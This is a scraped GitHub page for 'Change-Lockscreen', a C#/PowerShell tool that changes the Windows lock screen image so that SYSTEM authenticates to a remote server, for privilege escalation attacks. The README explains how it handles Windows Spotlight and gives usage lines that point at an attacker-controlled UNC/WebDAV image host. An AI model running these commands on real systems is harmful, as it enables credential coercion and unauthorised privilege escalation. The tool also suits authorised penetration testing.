Skip to content
Offensive tool to trigger network authentications as SYSTEM
C# PowerShell
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Type Name Latest commit message Commit time
Failed to load latest commit information.
Change-Lockscreen project files moved from gitlab Aug 2, 2019
LICENSE Create LICENSE Aug 12, 2019


Change-Lockscreen is a tool to trigger network authentications as SYSTEM by changing the Windows lock screen image from the command line to perform privilege escalation attacks such as the one described in the post linked below:


By default, Windows 10 has a feature called Windows Spotlight. It downloads and displays lock screen images automatically.

  • When this feature is enabled, Change-Lockscreen will disable it and establish the image specified in the arguments
  • Otherwise if the user has a custom lock screen image, Change-Lockscreen will be in charge to run a backup of it, trigger the network authentication, and establish it again

Note: while the PowerShell version of the tool works reliably, the C# version sometimes fails to restore the original image.


Change-Lockscreen -FullPath \\[imageserver]@[port]\[fakePath]\[image.jpg]
Change-Lockscreen -Webdav \\[imageserver]@[port]\ 

Watch the video


  • Simone Salucci
  • Daniel López Jiménez


You can’t perform that action at this time.